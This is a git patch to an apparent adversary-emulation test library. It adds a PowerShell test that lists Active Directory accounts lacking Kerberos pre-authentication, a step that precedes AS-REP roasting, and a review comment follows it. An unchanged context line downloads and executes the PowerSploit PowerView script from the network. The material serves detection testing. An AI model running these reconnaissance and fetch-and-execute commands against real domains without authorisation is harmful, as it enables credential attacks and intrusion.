From 90285a3fe1daebca139580bfa1bf0218d5afb12f Mon Sep 17 00:00:00 2001
From: Brandon Morgan
Date: Thu, 25 Jun 2020 15:35:46 -0500
Subject: [PATCH] Update T1069.002.yaml (#1082) test to enumerate accounts not requiring kerb preauth
---
 atomics/T1069.002/T1069.002.yaml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 1b7a9355..ac73862b 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -78,4 +78,14 @@ atomic_tests:
 executor:
 command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
 name: powershell
-
+- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
+ description: |
+ When successful, accounts that do not require kerberos pre-auth will be returned
+ Requires the Active Directory module for powershell to be installed
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
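Review bot: The new test's description says the Active Directory PowerShell module is required, but the test declares no `dependencies` entry. On a host without the module, `get-aduser` fails as an unknown command and the run looks like a failed technique rather than an unmet prerequisite. A `dependencies` block whose `prereq_command` checks for the module would let the runner report that cleanly and keep results comparable across hosts. Separately, the command enumerates user accounts by a Kerberos account setting rather than group membership, so filing it under T1069.002 may skew detection-coverage mapping; T1087.002 looks like a closer fit and is worth confirming with the maintainers.

```yaml
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
  # … unchanged: description, supported_platforms …
  dependency_executor_name: powershell
  dependencies:
  - description: |
      The ActiveDirectory PowerShell module must be available on the host
    prereq_command: |
      if (Get-Module -ListAvailable -Name ActiveDirectory) { exit 0 } else { exit 1 }
    get_prereq_command: |
      Write-Host "Install the RSAT Active Directory module for this Windows edition, then re-run the test"
  # … unchanged: executor …
```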